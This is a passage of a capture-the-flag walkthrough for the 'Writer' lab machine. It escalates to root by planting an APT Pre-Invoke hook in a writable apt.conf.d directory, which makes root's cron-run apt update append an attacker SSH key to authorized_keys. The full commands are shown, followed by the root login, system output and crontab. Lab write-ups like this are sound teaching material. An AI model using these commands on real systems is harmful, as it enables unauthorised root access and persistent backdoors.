APT cronjob
The target system appears to have a cronjob configured to run the apt update command every minute.
The current user (john) has write access to the apt configuration directory at /etc/apt/apt.conf.d
john@writer:~$ echo 'echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali" >> ~/.ssh/authorized_keys' > /dev/shm/pe ; chmod 755 /dev/shm/peI will first create a binary, /dev/shm/pe, which will append my public SSH key to the authorized_keys file of whoever executing. (root in this case)
john@writer:~$ cat /dev/shm/pe
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali" >> ~/.ssh/authorized_keysall set
john@writer:~$ echo 'APT::Update::Pre-Invoke {"/dev/shm/pe";};' > /etc/apt/apt.conf.d/00-peNow, I will set up a configuration to apt to execute, /dev/shm/pe, after performing the apt update command from the root cronjob
┌──(kali㉿kali)-[~/archive/htb/labs/writer]
└─$ ssh root@writer.htb -i ~/.ssh/id_ed25519
enter passphrase for key '/home/kali/.ssh/id_ed25519':
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* documentation: https://help.ubuntu.com
* management: https://landscape.canonical.com
* support: https://ubuntu.com/advantage
system information as of wed 19 apr 22:37:49 UTC 2023
system load: 0.16
usage of /: 66.4% of 6.82GB
memory usage: 40%
swap usage: 0%
processes: 272
users logged in: 2
ipv4 address for eth0: 10.10.11.101
ipv6 address for eth0: dead:beef::250:56ff:feb9:8e54
0 updates can be applied immediately.
The list of available updates is more than a week old.
to check for new updates run: sudo apt update
failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
You have new mail.
last login: Mon Aug 2 07:27:54 2021
root@writer:~# whoami
root
root@writer:~# hostname
writer
root@writer:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.101 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 dead:beef::250:56ff:feb9:8e54 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:8e54 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:8e:54 txqueuelen 1000 (Ethernet)
RX packets 1260023 bytes 214491738 (214.4 MB)
RX errors 0 dropped 240 overruns 0 frame 0
TX packets 1697929 bytes 805640196 (805.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 5124637 bytes 10739777357 (10.7 GB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5124637 bytes 10739777357 (10.7 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise
beyond
root@writer:~# crontab -l | grep -v '^#'
MAILTO=""
*/2 * * * * /usr/bin/cp /root/.scripts/disclaimer /etc/postfix/disclaimer
*/2 * * * * /usr/bin/cp /root/.scripts/master.cf /etc/postfix/master.cf
*/2 * * * * /usr/bin/find /etc/apt/apt.conf.d/ -mtime -1 -exec rm {} \;
*/2 * * * * /usr/bin/apt-get update
*/2 * * * * /usr/bin/cp -r /root/.scripts/writer2_project /var/www/
* * * * * /usr/bin/rm /tmp/*Aha.